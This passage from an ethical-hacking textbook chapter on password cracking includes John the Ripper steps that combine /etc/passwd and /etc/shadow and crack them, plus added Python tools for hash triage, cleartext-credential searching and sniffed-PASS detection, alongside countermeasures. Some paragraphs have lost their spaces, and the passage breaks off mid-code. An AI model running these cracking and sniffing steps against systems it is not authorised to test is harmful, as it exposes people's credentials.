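        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts.append((parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return accounts


def triage(text):
    """Flag what a tester wants to know before cracking starts."""
    accounts = parse_pwdump(text)
    by_nt = {}
    for user, rid, lm, nt in accounts:
        by_nt.setdefault(nt, []).append(user)
    return {
        # An NT hash equal to the empty-password constant means no password at all.
        "empty_password": [u for u, r, lm, nt in accounts if nt == EMPTY_NT],
        # A non-empty LM hash means the legacy 14-character LM hash is still
        # stored for that account; LM rainbow tables recover those quickly.
        "lm_stored": [u for u, r, lm, nt in accounts if lm != EMPTY_LM],
        # NT hashes are unsalted, so identical hashes mean identical passwords.
        "shared_password": [users for nt, users in by_nt.items()
                            if len(users) > 1 and nt != EMPTY_NT],
        # RID 500 is the built-in Administrator whatever it has been renamed to.
        "builtin_admin": [u for u, r, lm, nt in accounts if r == 500],
        "worth_cracking": [u for u, r, lm, nt in accounts if nt != EMPTY_NT],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

Two of the findings need no cracking at all: accounts with the empty NT hash can be logged into with a blank password, and accounts sharing an NT hash share a password, which is exactly the reuse problem described earlier in this chapter made visible by the lack of a salt.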

Cracking UNIX/Linux passwords with John the Ripper

John the Ripper can also crack UNIX/Linux passwords. You need root access to your system and to the password (/etc/passwd) and shadow password (/etc/shadow) files. Perform the following steps for cracking UNIX/Linux passwords:

1. Download the UNIX source files from www.openwall.com/john.

2. Extract the program by entering the following command:

[root@localhost kbeaver]# tar -xJf john-1.8.0.tar.xz

or whatever the current filename is. (The archive is xz-compressed, so tar needs -J rather than the -z used for gzip; recent versions of tar also detect the compression on their own with plain -xf.)

You can also crack UNIX or Linux passwords on a Windows system by using the Windows/DOS version of John the Ripper.

3. Change to the src directory that was created when you extracted the program and enter the following command:

make generic

(Running make with no target lists the platform-specific targets, such as linux-x86-64, which build a faster binary than the portable generic one.)

4. Change to the run directory and enter the following command to use the unshadow program to combine the passwd and shadow files and copy them to the file cracked.txt:

./unshadow /etc/passwd /etc/shadow > cracked.txt

The unshadow process won't work with all UNIX variants.

5. Enter the following command to start the cracking process:

./john cracked.txt

When John the Ripper is complete (and this could take some time), the output is similar to the results of the preceding Windows process. (Refer to Figure 8-3.) You can list everything cracked so far at any point with ./john --show cracked.txt; John records cracked passwords in the john.pot file in the run directory, so treat that file as sensitively as the hashes themselves.
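The following is an added example (not code from the book or from John the Ripper) of what the unshadow step in the procedure above does and what a tester should look at in the result before starting a long cracking run: which accounts are locked, which have no password at all, and which crypt algorithm each hash uses, since that determines how fast John can work on it. The /etc/passwd and /etc/shadow excerpts are constructed, and the hash values are placeholders in the real $id$salt$hash layout rather than hashes of any real password.

```python
# Added example, not code from the book. The passwd/shadow excerpts are
# constructed and the hash bodies are placeholders in the real $id$salt$hash
# layout, not hashes of any particular password.

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
kbeaver:x:1000:1000:Kevin Beaver:/home/kbeaver:/bin/bash
legacy:x:1001:1001::/home/legacy:/bin/sh
svc:x:1002:1002::/var/lib/svc:/usr/sbin/nologin
guest:x:1003:1003::/home/guest:/bin/sh
"""

SAMPLE_SHADOW = """\
root:$6$saltsalt$PLACEHOLDERSHA512CRYPTHASH:17000:0:99999:7:::
daemon:*:17000:0:99999:7:::
kbeaver:$y$j9T$saltsalt$PLACEHOLDERYESCRYPTHASH:17000:0:99999:7:::
legacy:$1$saltsalt$PLACEHOLDERMD5CRYPT:17000:0:99999:7:::
svc:!:17000:0:99999:7:::
guest::17000:0:99999:7:::
"""

# crypt(3) identifiers found between the first two "$" signs of a hash.
HASH_TYPES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
              "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}


def unshadow(passwd_text, shadow_text):
    """Replace the 'x' placeholder in passwd with the hash from shadow, keeping
    passwd's field layout, as John's unshadow utility does."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line.strip():
            fields = line.split(":")
            hashes[fields[0]] = fields[1]
    out = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])
        out.append(":".join(fields))
    return "\n".join(out)


def classify(hash_field):
    """Name the algorithm, or say why the account cannot be cracked."""
    if hash_field == "":
        return "none"          # empty field: login with no password at all
    if hash_field == "x":
        return "unknown"       # still shadowed; no shadow entry was found
    if hash_field.startswith(("*", "!")):
        return "locked"        # password login disabled
    if hash_field.startswith("$"):
        return HASH_TYPES.get(hash_field.split("$")[1], "unknown")
    return "descrypt" if len(hash_field) == 13 else "unknown"


def triage(passwd_text, shadow_text):
    """Map each user to the classification of its merged hash field."""
    result = {}
    for line in unshadow(passwd_text, shadow_text).splitlines():
        user, hash_field = line.split(":")[:2]
        result[user] = classify(hash_field)
    return result


def crackable(passwd_text, shadow_text):
    """Users whose hashes are worth feeding to John."""
    return [u for u, kind in triage(passwd_text, shadow_text).items()
            if kind not in ("none", "locked", "unknown")]


if __name__ == "__main__":
    for user, kind in triage(SAMPLE_PASSWD, SAMPLE_SHADOW).items():
        print(f"{user}: {kind}")
    print("worth cracking:", crackable(SAMPLE_PASSWD, SAMPLE_SHADOW))
```

The algorithm matters for the time budget discussed earlier in this chapter: md5crypt hashes run far faster through a cracker than sha512crypt, bcrypt, or yescrypt, so a lone legacy account with an old hash type is often the quickest win on an otherwise well-configured system. The guest account here needs no cracking at all; an empty field in /etc/shadow is the UNIX equivalent of the no-password accounts described in the Windows section.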

After completing the preceding Windows or UNIX steps, you can force users to change passwords that don't meet specific password policy requirements, you can create a new password policy, or you can use the information to update your security awareness program. Just do something.

Be careful handling the results of your password cracking efforts. You create an accountability issue because more than one person now knows the passwords. Always treat the password information of others as strictly confidential. If you end up storing them on your test system, make sure it's extra secure. If it's a laptop, encrypting the hard drive is the best defense.

Passwords by the numbers

One hundred twenty-eight different ASCII characters are used in typical computer passwords. (Technically, only 126 characters are used because you can't use the NULL and the carriage return characters.) A truly random eight-character password that uses 126 different characters can have 63,527,879,748,485,376 (126 to the 8th power) different combinations. Taking that a step further, if it were possible (and it is in Linux and UNIX) to use all 256 byte values of extended ASCII (254, without the NULL and carriage return characters) in a password, 17,324,859,965,700,833,536 (254 to the 8th power) different combinations would be available. This is more than 2 billion times more combinations than there are people on earth!

A text file containing all the possible passwords would require millions of terabytes of storage space. Even if you include only the more realistic combination of 95 or so ASCII letters, numbers, and standard punctuation characters, such a file would still fill thousands of terabytes of storage space. These storage requirements force dictionary and brute-force password-cracking programs to form the password combinations on the fly, instead of reading all possible combinations from a text file. Rainbow tables sit between the two extremes: they trade memory for time by storing only the endpoints of long chains of hash computations, so a table of a few gigabytes can stand in for a keyspace that would take terabytes to store in full. That's why rainbow attacks are more effective at cracking unsalted passwords than dictionary and brute-force attacks.

Given the effectiveness of rainbow password attacks, it's tempting to think that eventually anyone will be able to crack all possible password combinations, given the current technology and an average lifespan. It probably won't happen; however, many thought in the 1980s that 640K of RAM and a 10MB hard drive in a PC were all that would ever be needed!

Cracking password-protected files

Do you wonder how vulnerable password-protected word-processing, spreadsheet, and Zip files are when users send them into the wild blue yonder? Wonder no more. Some great utilities can show how easily passwords are cracked.

Cracking files

Most password-protected files can be cracked in seconds or minutes. You can demonstrate this "wow factor" security vulnerability to users and management. Here's a hypothetical scenario that could occur in the real world:

1. Your CFO wants to send some confidential financial information in an Excel spreadsheet to a company board member.

2. She protects the spreadsheet by assigning it a password during the file-save process in Excel.

3. For good measure, she uses WinZip to compress the file and adds another password to make it really secure.

4. The CFO sends the spreadsheet as an e-mail attachment, assuming that the e-mail will reach its destination.

The board member's firm has content filtering, which monitors incoming e-mails for keywords and file attachments. Unfortunately, that firm's network administrator is looking in the content-filtering system to see what's coming in.

5. This rogue network administrator finds the e-mail with the confidential attachment, saves the attachment, and realizes that it's password protected.

6. The network administrator remembers a great password-cracking tool available from ElcomSoft called Advanced Archive Password Recovery (www.elcomsoft.com/archpr.html) that can help him out, so he proceeds to use it to crack the password.

Cracking password-protected files is as simple as that! Now all that the rogue network administrator must do is forward the confidential spreadsheet to his buddies or to the company's competitors.

If you carefully select the right options in Advanced Archive Password Recovery, you can drastically shorten your testing time. For example, if you know that a password is not over five characters long or is lowercase letters only, you shrink the search space by orders of magnitude: five lowercase letters give about 12 million candidates (26 to the 5th power), versus about 7.7 billion (95 to the 5th power) for five characters drawn from the full printable set.

I recommend performing these file-password-cracking tests on files that you capture with a content filtering or network analysis tool. This is a good way to determine whether your users are adhering to policy and using adequate passwords to protect sensitive information they're sending.

Countermeasures

The best defense against weak file password protection is to require your users to use a stronger form of file protection, such as PGP, or the AES encryption that's built into WinZip, when necessary. (The legacy ZipCrypto scheme in older Zip tools is weak regardless of the password chosen; AES-256 is sound, but it is only as strong as the passphrase protecting it.) Ideally, you don't want to rely on users to make decisions about what they should use to secure sensitive information, but it's better than nothing. Stress that a file encryption mechanism, such as a password-protected Zip file, is secure only if users keep their passwords confidential and never transmit or store them in unsecure cleartext (such as in a separate e-mail).

If you're concerned about unsecure transmissions through e-mail, consider using a content-filtering system or a data loss prevention system to block all outbound e-mail attachments that aren't protected on your e-mail server.

UnderstandingotherwaystocrackpasswordsOvertheyears,I’vefoundotherwaystocrack(orcapture)passwordstechnicallyandthroughsocialengineering.

KeystrokeloggingOneofthebesttechniquesforcapturingpasswordsisremotekeystrokelogging—theuseofsoftwareorhardwaretorecordkeystrokesasthey’retypedintothecomputer.

Becarefulwithkeystrokelogging.Evenwithgoodintentions,monitoringemployeesraisesvariouslegalissuesifit’snotdonecorrectly.Discusswithyourlegalcounselwhatyou’llbedoing,askfortheirguidance,andgetapprovalfromuppermanagement.

Loggingtools

Withkeystroke-loggingtools,youcanassessthelogfilesofyourapplicationtoseewhatpasswordspeopleareusing:

Keystroke-loggingapplicationscanbeinstalledonthemonitoredcomputer.IrecommendthatyoucheckoutSpector360bySpectorSoft(www.spector360.com).DozensofothersuchtoolsareavailableontheInternet.Hardware-basedtools,suchasKeyGhost(www.keyghost.com),fitbetweenthekeyboardandthecomputerorreplacethekeyboardaltogether.

Akeystroke-loggingtoolinstalledonasharedcomputercancapturethepasswordsofeveryuserwhologsin.

Countermeasures

Thebestdefenseagainsttheinstallationofkeystroke-loggingsoftwareonyoursystemsistouseananti-malwareprogramorsimilarendpointprotectionsoftwarethatmonitorsthelocalhost.It’snotfoolproofbutcanhelp.Asforphysicalkeyloggers,you’llneedtovisuallyinspecteachsystem.

Thepotentialforhackerstoinstallkeystroke-loggingsoftwareisanotherreasontoensurethatyourusersaren’tdownloadingandinstallingrandomsharewareoropeningattachmentsinunsolicitede-mails.ConsiderlockingdownyourdesktopsbysettingtheappropriateuserrightsthroughlocalorgroupsecuritypolicyinWindows.Alternatively,youcoulduseacommerciallockdownprogram,suchasFortres101(www.fortresgrand.com)forWindowsorDeepFreezeEnterprise(www.faronics.com/products/deep-freeze/enterprise)forWindows,Linux,andMacOSX.AdifferenttechnologythatstillfallsintothiscategoryisBit9’s“positivesecurity”whitelistingapplication(www.bit9.com)thatallowsyoutoconfigurewhichexecutablescanberunonanygivensystem.It’sintendedtofightoffadvancedmalwarebutcouldcertainlybeusedinthissituation.

WeakpasswordstorageManylegacyandstandaloneapplications,suchase-mail,dial-upnetworkconnections,andaccountingsoftware,storepasswordslocally,makingthemvulnerabletopasswordhacking.Byperformingabasictextsearch,I’vefoundpasswordsstoredincleartextonthelocalharddrivesofmachines.YoucanautomatetheprocessevenfurtherbyusingaprogramcalledFileLocatorPro(www.mythicsoft.com).IcoverthesefileandrelatedstoragevulnerabilitiesinChapter16.

Searching

Youcantryusingyourfavoritetext-searchingutility—suchastheWindowssearchfunction,findstr,orgrep—tosearchforpasswordorpasswdonyourcomputer’sdrives.Youmightbeshockedtofindwhat’sonyoursystems.Someprogramsevenwritepasswordstodiskorleavethemstoredinmemory.

Weakpasswordstorageisacriminalhacker’sdream.Headitoffifyoucan.Thisdoesn’tmeantoimmediatelyrunoffandstartusingacloud-basedpasswordmanager.Aswe’veseenovertheyears,thosesystemsgethackedaswell!
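The following Python script is an added example of the search described above, not code from the book or from any of the tools it names. It scans a few constructed sample files for lines that look like a stored credential (a password/passwd/pass/pwd key followed by a value) and reports where they are, with the value masked so the audit report itself doesn’t become another cleartext copy. The scan_directory helper applies the same check to a real directory tree.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed sample files (path -> contents). They stand in for files found on
# a user's drive; nothing here comes from a real system.
SAMPLE_FILES: Dict[str, str] = {
    "C:/Users/alice/mail/account.ini": "server=mail.example.test\nuser=alice\npassword=Summer2016!\n",
    "C:/Users/alice/dialup/isp.cfg": "dialnumber=5551234\npasswd = hunter2\n",
    "C:/Users/alice/notes.txt": "Remember to update the password policy document.\n",
    "C:/Users/alice/app.conf": "passwordfile=/secure/vault.enc\n",
}

# Only a key=value (or key: value) shape on its own line counts as a hit, so a
# sentence that merely contains the word "password" is not reported.
CRED_PATTERN = re.compile(
    r"^[ \t]*(?P<key>password|passwd|pass|pwd)[ \t]*[=:][ \t]*(?P<value>\S+)[ \t]*$",
    re.IGNORECASE | re.MULTILINE,
)

Hit = Tuple[str, int, str, str]   # (path, line number, key, masked value)


def mask(value: str) -> str:
    """Keep only the first character so the report itself does not leak the secret."""
    return value[:1] + "*" * (len(value) - 1)


def find_cleartext_credentials(files: Dict[str, str]) -> List[Hit]:
    """Apply the credential pattern to each file's text and return every hit."""
    hits: List[Hit] = []
    for path, text in files.items():
        for m in CRED_PATTERN.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            hits.append((path, line_no, m.group("key").lower(), mask(m.group("value"))))
    return hits


def scan_directory(root: str, max_bytes: int = 1_000_000) -> List[Hit]:
    """Walk a real directory tree and apply the same check to each readable file."""
    collected: Dict[str, str] = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    collected[path] = fh.read(max_bytes)
            except OSError:
                continue   # unreadable or vanished file: skip it, don't abort the audit
    return find_cleartext_credentials(collected)


if __name__ == "__main__":
    for path, line_no, key, masked in find_cleartext_credentials(SAMPLE_FILES):
        print(f"{path}:{line_no}: {key}={masked}")
```

Run against the samples, it reports the mail account file and the dial-up configuration but not the notes file (plain prose) or the passwordfile= setting (a path, not a secret). The pattern is deliberately narrow; widen it once you know which applications on your systems write credentials and in what shape.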

Countermeasures

The only reliable way to eliminate weak password storage is to use only applications that store passwords securely. This might not be practical, but it’s your only guarantee that your passwords are secure. Another option is to instruct users not to store their passwords when prompted.

Before upgrading applications, contact your software vendor to see how they manage passwords, or search for a third-party solution.

Network analyzer

A network analyzer sniffs the packets traversing the network. This is what the bad guys do if they can gain control of a computer, tap into your wireless network, or gain physical network access to set up their network analyzer. If they gain physical access, they can look for a network jack on the wall and plug right in!

Testing

Figure 8-4 shows how crystal-clear passwords can be through the eyes of a network analyzer. This figure shows how Cain & Abel (www.oxid.it/cain.html) can glean thousands of passwords going across the network in a matter of a couple of hours. As you can see in the left pane, these cleartext password vulnerabilities can apply to FTP, web, telnet, and more. (The actual usernames and passwords are blurred out to protect them.)

Figure 8-4: Using Cain & Abel to capture passwords going across the network.

If traffic is not tunneled through a VPN, SSH, SSL, or some other form of encrypted link, it’s vulnerable to attack.

Cain & Abel is a password-cracking tool that also has network analysis capabilities. You can also use a regular network analyzer, such as the commercial products OmniPeek (www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis) and CommView (www.tamos.com/products/commview) as well as the free open source program, Wireshark (www.wireshark.org). With a network analyzer, you can search for password traffic in various ways. For example, to capture POP3 password traffic, you can set up a filter and a trigger to search for the PASS command. When the network analyzer sees the PASS command in the packet, it captures that specific data.

Network analyzers require you to capture data on a hub segment of your network or via a monitor/mirror/span port on a switch. Otherwise, you can’t see anyone else’s data traversing the network — just yours. Check your switch’s user guide for whether it has a monitor or mirror port and instructions on how to configure it. You can connect your network analyzer to a hub on the public side of your firewall. You’ll capture only those packets that are entering or leaving your network — not internal traffic. I cover this type of network infrastructure hacking in detail in Chapter 9.
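To show what the PASS trigger described above actually catches, here is an added Python example (not from the book and not Cain & Abel’s or Wireshark’s code) that runs the same idea over a handful of constructed packets: it pairs each POP3 or FTP PASS command with the preceding USER command from the same connection and also decodes HTTP Basic Authorization headers, while the TLS record on port 443 yields nothing. The packet layout, addresses, and credentials are all made up for the illustration, and secrets are masked in the output so the finding can go into a report.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Packet:
    src: str
    dst: str
    dport: int
    payload: bytes


@dataclass
class Finding:
    protocol: str
    src: str
    dst: str
    username: Optional[str]
    masked_secret: str


# Constructed sample traffic, not captured from any real network. A TLS record
# on 443 is included to show that encrypted traffic yields nothing.
SAMPLE_PACKETS: List[Packet] = [
    Packet("10.0.0.5", "10.0.0.20", 110, b"USER bob\r\n"),
    Packet("10.0.0.5", "10.0.0.20", 110, b"PASS letmein\r\n"),
    Packet("10.0.0.7", "10.0.0.21", 21, b"USER anonymous\r\n"),
    Packet("10.0.0.7", "10.0.0.21", 21, b"PASS guest@\r\n"),
    Packet("10.0.0.9", "10.0.0.80", 80,
           b"GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic Ym9iOmxldG1laW4=\r\n\r\n"),
    Packet("10.0.0.9", "10.0.0.80", 443, b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"),
    Packet("10.0.0.5", "10.0.0.20", 110, b"LIST\r\n"),
]

PORT_PROTOCOL: Dict[int, str] = {21: "FTP", 110: "POP3"}   # both use USER / PASS commands
BASIC_RE = re.compile(rb"^Authorization:[ \t]*Basic[ \t]+([A-Za-z0-9+/=]+)[ \t]*\r?$",
                      re.IGNORECASE | re.MULTILINE)


def mask(secret: str) -> str:
    """Keep the first character only, so findings can be reported without the secret."""
    return secret[:1] + "*" * (len(secret) - 1)


def detect_cleartext_auth(packets: List[Packet]) -> List[Finding]:
    """Flag credentials sent in the clear, pairing each PASS with the preceding USER."""
    findings: List[Finding] = []
    last_user: Dict[Tuple[str, str, int], str] = {}   # per (src, dst, port) connection
    for p in packets:
        proto = PORT_PROTOCOL.get(p.dport)
        if proto is not None:
            line = p.payload.decode("ascii", errors="replace").strip()
            verb, _, arg = line.partition(" ")
            if verb.upper() == "USER":
                last_user[(p.src, p.dst, p.dport)] = arg
            elif verb.upper() == "PASS":        # the trigger the text describes
                findings.append(Finding(proto, p.src, p.dst,
                                        last_user.get((p.src, p.dst, p.dport)), mask(arg)))
        elif p.dport == 80:
            m = BASIC_RE.search(p.payload)
            if m is None:
                continue
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", errors="replace")
            except ValueError:                  # malformed base64: not a usable credential
                continue
            user, _, secret = decoded.partition(":")
            findings.append(Finding("HTTP Basic", p.src, p.dst, user, mask(secret)))
    return findings


if __name__ == "__main__":
    for f in detect_cleartext_auth(SAMPLE_PACKETS):
        print(f"{f.protocol:10} {f.src} -> {f.dst} user={f.username} pass={f.masked_secret}")
```

Feeding it real traffic means reassembling TCP streams from a capture on a mirror port first; the point of the example is the matching logic, which is the same trigger a commercial analyzer applies.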

Countermeasures

Here are some good defenses against network analyzer attacks:

Use switches on your network, not hubs. Ethernet hubs are a thing of the past; however, I still see them in use occasionally. If you must use hubs on network segments, a program like sniffdet (http://sniffdet.sourceforge.net) for UNIX-based systems and PromiscDetect (http://ntsecurity.nu/toolbox/promiscdetect) for Windows can detect network cards in promiscuous mode (accepting all packets, whether destined for the local machine or not). A network card in promiscuous mode signifies that a network analyzer may be running on the network.

Make sure that unsupervised areas, such as an unoccupied lobby or training room, don’t have live network connections.

Don’t let anyone without a business need gain physical access to your switches or to the network connection on the public side of your firewall. With physical access, a hacker can connect to a switch monitor port or tap into the unswitched network segment outside the firewall and capture packets.

Switches don’t provide complete security because they’re vulnerable to ARP poisoning attacks, which I cover in Chapter 9.

Weak BIOS passwords

Most computer BIOS (basic input/output system) settings allow power-on passwords and/or setup passwords to protect the computer’s hardware settings that are stored in the CMOS chip. Here are some ways around these passwords:

You can usually reset these passwords either by unplugging the CMOS battery or by changing a jumper on the motherboard.

Password-cracking utilities for BIOS passwords are available on the Internet and from computer manufacturers.

If gaining access to the hard drive is your ultimate goal, you can simply remove the hard drive from the computer and install it in another one, and you’re good to go. This is a great way to prove that BIOS/power-on passwords are not an effective countermeasure for lost or stolen laptops.

For a good list of default system passwords for various vendor equipment, check www.cirt.net/passwords.

There are tons of variables for hacking and hacking countermeasures depending on your hardware setup. If you plan to hack your own BIOS passwords, check for information in your user manual or refer to the BIOS password-hacking guide I wrote at http://searchenterprisedesktop.techtarget.com/tutorial/BIOS-password-hacking. If protecting the information on your hard drives is your ultimate goal, then full (sometimes referred to as whole) disk encryption is the best way to go. I cover mobile-related password cracking in-depth in Chapter 11. The good news is that newer computers (within the past five years or so) are using a new type of BIOS called unified extensible firmware interface (UEFI), which is much more resilient to boot-level system cracking attempts. Still, a weak password may be all it takes for the system to be exploited.

Weak passwords in limbo

Bad guys often exploit user accounts that have just been created or reset by a network administrator or help desk. New accounts might need to be created for new employees or even for your own security testing purposes. Accounts might need to be reset if users forget their passwords or if the accounts have been locked out because of failed attempts.

Weaknesses

Here are some reasons why user accounts can be vulnerable:

When user accounts are reset, they often are assigned an easily-cracked password (such as the user’s name or the word password). The time between resetting the user account and changing the password is a prime opportunity for a break-in.

Many systems have either default accounts or unused accounts with weak passwords or no passwords at all. These are prime targets.

Countermeasures

The best defenses against attacks on passwords in limbo are solid help desk policies and procedures that prevent weak passwords from being available at any given time during the new account generation and password reset processes. Perhaps the best ways to overcome this vulnerability are as follows:

Require users to be on the phone with the help desk, or have a help desk member perform the reset at the user’s desk.

Require that the user immediately log in and change the password.

If you need the ultimate in security, implement stronger authentication methods, such as challenge/response questions, smart cards, or digital certificates.

Automate password reset functionality via self-service tools on your network so users can manage most of their password problems without help from others.

I cover mobile-related password cracking in Chapter 11 and website/application password cracking in Chapter 15.

General Password Cracking Countermeasures

A password for one system usually equals passwords for many other systems because many people use the same (or at least similar) passwords on every system they use. For this reason, you might want to consider instructing users to create different passwords for different systems, especially on the systems that protect information that’s more sensitive. The only downside to this is that users have to keep multiple passwords and, therefore, might be tempted to write them down, which can negate any benefits.

Strong passwords are important, but you need to balance security and convenience:

You can’t expect users to memorize passwords that are insanely complex and must be changed every few weeks.

You can’t afford weak passwords or no passwords at all, so come up with a strong password policy and accompanying standard — preferably one that requires long and strong passphrases (combinations of words that are easily remembered yet next to impossible to crack) that have to be changed only once or twice a year.

Storing passwords

If you have to choose between weak passwords that your users can memorize and strong passwords that your users must write down, I recommend having readers write down passwords and store the information securely. Train users to store their written passwords in a secure place — not on keyboards or in easily cracked password-protected computer files (such as spreadsheets). Users should store a written password in any of these locations:

A locked file cabinet or office safe

Full (whole) disk encryption, which can prevent an intruder from ever accessing the OS and passwords stored on the system. Just know it’s not foolproof, as I outline in Chapter 11.

A secure password management tool such as:

LastPass (http://lastpass.com)

Password Safe, an open source software originally developed by Counterpane (http://passwordsafe.sourceforge.net)

Again, as I mentioned earlier, applications such as these are not impervious to attack, so be careful.

No passwords on sticky notes! People joke about it, but it still happens a lot, and it’s not good for business!

Creating password policies

As an ethical hacker, you should show users the importance of securing their passwords. Here are some tips on how to do that:

Demonstrate how to create secure passwords. Refer to them as passphrases because people tend to take passwords literally and use only words, which can be less secure.

Show what can happen when weak passwords are used or passwords are shared.

Diligently build user awareness of social engineering attacks.

Enforce (or at least encourage the use of) a strong password-creation policy that includes the following criteria:

Use upper- and lowercase letters, special characters, and numbers. Never use only numbers. Such passwords can be cracked quickly.

Misspell words or create acronyms from a quote or a sentence. For example, ASCII is an acronym for American Standard Code for Information Interchange that can also be used as part of a password.

Use punctuation characters to separate words or acronyms.

Change passwords every 6 to 12 months or immediately if they’re suspected of being compromised. Anything more frequent introduces an inconvenience that serves only to create more vulnerabilities.

Use different passwords for each system. This is especially important for network infrastructure hosts, such as servers, firewalls, and routers. It’s okay to use similar passwords — just make them slightly different for each type of system, such as SummerInTheSouth-Win10 for Windows systems and Linux+SummerInTheSouth for Linux systems.

Use variable-length passwords. This trick can throw off attackers because they won’t know the required minimum or maximum length of passwords and must try all password length combinations.

Don’t use common slang words or words that are in a dictionary.

Don’t rely completely on similar-looking characters, such as 3 instead of E, 5 instead of S, or ! instead of 1. Password-cracking programs and dictionaries are available to help check for this.

Don’t reuse the same password within at least four to five password changes.

Use password-protected screen savers. Unlocked screens are a great way for systems to be compromised. You could have the strongest passwords and best full disk encryption in the world, but none of that matters if the computer is left unattended with the screen unlocked.

Don’t share passwords. To each his or her own!

Avoid storing user passwords in an unsecured central location, such as an unprotected spreadsheet on a hard drive. This is an invitation for disaster.

Use a password manager to store user passwords if you’re willing. I’m not, just yet.
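The checkable parts of the policy above (character mix, no numbers-only, no single dictionary word even with look-alike substitutions, no reuse within the last few changes) fit in a short filter. The following Python function is an added example, not from the book and not any operating system’s password filter; the 12-character minimum, the tiny word list, and the substitution table are assumptions made for the illustration.

```python
import re
from typing import List, Tuple

# Constructed mini wordlist standing in for a cracking dictionary.
DICTIONARY = {"password", "summer", "welcome", "letmein", "monkey", "dragon", "qwerty", "football"}

# Look-alike substitutions that cracking dictionaries already undo
# (the text's examples, 3 for E and 5 for S, plus a few other common ones).
LEET = str.maketrans({"3": "e", "5": "s", "0": "o", "1": "l", "@": "a", "$": "s", "4": "a", "7": "t"})

MIN_LENGTH = 12      # assumption: the text asks for "long" passphrases but gives no number
HISTORY_DEPTH = 5    # "at least four to five password changes"


def letters_only(s: str) -> str:
    """Drop everything but a-z so 'summer2016!' collapses to 'summer'."""
    return re.sub(r"[^a-z]", "", s)


def check_password(candidate: str, history: List[str]) -> Tuple[bool, List[str]]:
    """Return (acceptable, list of policy violations) for a proposed password."""
    problems: List[str] = []

    if len(candidate) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")

    if candidate.isdigit():
        problems.append("numbers only")

    has_upper = re.search(r"[A-Z]", candidate) is not None
    has_lower = re.search(r"[a-z]", candidate) is not None
    has_digit = re.search(r"[0-9]", candidate) is not None
    has_special = re.search(r"[^A-Za-z0-9]", candidate) is not None
    if not (has_upper and has_lower and has_digit and has_special):
        problems.append("must mix upper- and lowercase letters, numbers and special characters")

    # Dictionary check, twice: once on the raw letters (catches "Summer2016!")
    # and once after undoing look-alike substitutions (catches "P@55w0rd!").
    lowered = candidate.lower()
    if letters_only(lowered) in DICTIONARY or letters_only(lowered.translate(LEET)) in DICTIONARY:
        problems.append("based on a single dictionary word")

    if candidate in history[-HISTORY_DEPTH:]:
        problems.append(f"reused within the last {HISTORY_DEPTH} passwords")

    return (not problems, problems)


if __name__ == "__main__":
    for pw in ["12345678901234", "P@55w0rd!", "Summer2016!", "SummerInTheSouth-Win10"]:
        ok, why = check_password(pw, [])
        print(f"{pw!r}: {'accepted' if ok else 'rejected: ' + '; '.join(why)}")
```

Note that the passphrase example from the text passes while the leet-speak and season-plus-year variants are rejected, which is exactly the distinction the policy is trying to draw. A real deployment would use a full wordlist (the same one a cracker would), not the eight words here.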

Taking other countermeasures

Here are some other password hacking countermeasures that I recommend:

Enable security auditing to help monitor and track password attacks.

Test your applications to make sure they aren’t storing passwords indefinitely in memory or writing them to disk. A good tool for this is WinHex (www.winhex.com/winhex/index-m.html). I’ve used this tool to search a computer’s memory for password, pass=, login, and so on and have come up with some passwords that the developers thought were cleared from memory.

Some password-cracking Trojan-horse applications are transmitted through worms or simple e-mail attachments. Such malware can be lethal to your password-protection mechanisms if they’re installed on your systems. The best defense is malware protection or whitelisting software, from Webroot, McAfee, or Bit9.

Keep your systems patched. Passwords are reset or compromised during buffer overflows or other denial of service (DoS) conditions.

Know your user IDs. If an account has never been used, delete or disable the account until it’s needed. You can determine unused accounts by manual inspection or by using a tool such as DumpSec (www.systemtools.com/somarsoft/?somarsoft.com), a tool that can enumerate the Windows operating system and gather user IDs and other information.

As the security manager in your organization, you can enable account lockout to prevent password-cracking attempts. Account lockout is the ability to lock user accounts for a certain time after a certain number of failed login attempts has occurred. Most operating systems (and some applications) have this capability. Don’t set it too low (fewer than five failed logins), and don’t set it too high to give a malicious user a greater chance of breaking in. Somewhere between 5 and 50 might work for you. I usually recommend a setting of around 10 or 15. Consider the following when configuring account lockout on your systems:

To use account lockout to prevent any possibilities of a user DoS condition, require two different passwords, and don’t set a lockout time for the first one if that feature is available in your operating system.

If you permit auto reset of the account after a certain period — often referred to as intruder lockout — don’t set a short time period. Thirty minutes often works well.

A failed login counter can increase password security and minimize the overall effects of account lockout if the account experiences an automated attack. A login counter can force a password change after a number of failed attempts. If the number of failed login attempts is high and occurred over a short period, the account has likely experienced an automated password attack.
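To make the interaction between the lockout threshold, the 30-minute intruder lockout, and the failed-login counter concrete, here is an added Python simulation (not from the book and not any operating system’s implementation). It uses the recommended threshold of 10 and the 30-minute auto reset from the text; the 60-second window that distinguishes an automated burst from a forgetful user is an assumption. The audit list stands in for the security auditing recommended above.

```python
from dataclasses import dataclass, field
from typing import Dict, List

LOCKOUT_THRESHOLD = 10       # the text recommends around 10 or 15 failed logins
LOCKOUT_SECONDS = 30 * 60    # "Thirty minutes often works well" for intruder lockout
BURST_WINDOW = 60            # assumption: this many seconds counts as a "short period"


@dataclass
class Account:
    password: str                   # plaintext only for the simulation; real systems store a hash
    failed_streak: int = 0          # consecutive failures since the last success or unlock
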